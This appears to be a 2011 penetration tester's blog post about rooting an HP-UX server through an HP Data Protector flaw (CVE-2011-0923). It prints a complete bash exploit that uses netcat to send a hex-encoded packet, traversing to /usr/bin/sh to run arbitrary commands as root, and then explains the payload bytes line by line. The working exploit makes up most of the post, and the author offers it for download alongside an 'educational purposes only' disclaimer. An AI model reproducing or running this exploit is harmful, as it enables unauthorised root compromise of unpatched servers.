In many pentest that I have done, HPUX is one of the more commons UNIX OS that I found. It is a strong operating system running in a robust hardware, and when I got to know more about the Lights Out functionality I just fall in love. Al thought many companies uses it for running their main part of their business I have found the they don’t pay much attention on it’s security so it’s common to find production servers without patches or even running applications on insecure protocols like Telnet, FTP or even rlogin.
Since HPUX has been around for a long time and HP was concerned about its security he created the project Bastile for HPUX. I had used it to secure servers and I can say that it’s great! You have to be really careful because it closes a lot of stuff and it may, no sorry, it will broke the connectivity with your oldest applications. ( by the way, it moves the users hashes to the /tcb/files/auth/ folder ;) ). This doesn’t mean you just run tomorrow, apply the Bastille on your servers and forget about them… YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY-
So this week I was working in a Pentest and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed, it wasn’t looking so good. Looking around I found that Data Protect has this nasty vulnerability and that fdisk has created a PoC for this Zero Day but in Windows. So with a lot of help from c4an (he ported this tool to the Metasploit Project that you can see in his blog) the server was compromised with root…. w00t w00t!
So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don’t own. You can also download it from my Hacking Projects section
#!/bin/bash
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link:http://www8.hp.com/us/en/software/software-
# product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/
# Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks
# Lots of thanks to David Llorens (@c4an) for all the help.
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits/17339/
#
# Shouts to shellhellboy, r3x, r0d00m, etlow,
# psymera, nitr0us and ppl in #mendozaaaa
#
[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` \n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)
" && exit 0
HOST=`echo ${@} | awk '{print $1}'`
PORT=`echo ${@} | awk '{print $2}'`
CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'`
SC=""
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SHELLCODE=${SC}
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}
This script is in Bash and can run in any Linux like Backtrack or in Windows using Cygwin and this is how it works:
The shellcode is 168 bytes and is injected directly on the port. The first 8 bytes of the 104 bytes of this shellcode is part of the protocol where we use the flag “C 20” to tell Data Protect (I found that if we manipulates this value other things can be accomplished even writing directly to / ) to perform the vulnerable function that allows remote connections and execute files within it’s local bin directory.
"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
"\x74\x2d\x00\x20\x30\x00\x20\x30\x00"
but if we use the Directory Path Traversal technique we can execute any binary within the file system. The next part was tricky, I can execute any command but I am unable to pass arguments directly to it, so after some debug I found I can spawn a /usr/bin/sh closing it with some nullbytes to get the complete 168 bytes and if I concatenates the command to execute it will pass directly to the shell and execute it with the user’s environment variables, in this case root, and returns us the output.
"\x20\x2e\x2e\x2f\x2e\x2e\x2f"
"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
So at the end I get this to work doing this:
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}
The Netcat helps me to transports the shellcode to the port and it returns the output. It simply works.
So special thanks to fdisk for the PoC and David Llorens for the useful brainstorming, he also ported this tool to the Metasploit Project that you can see in his blog.
Adrian Puente Z.
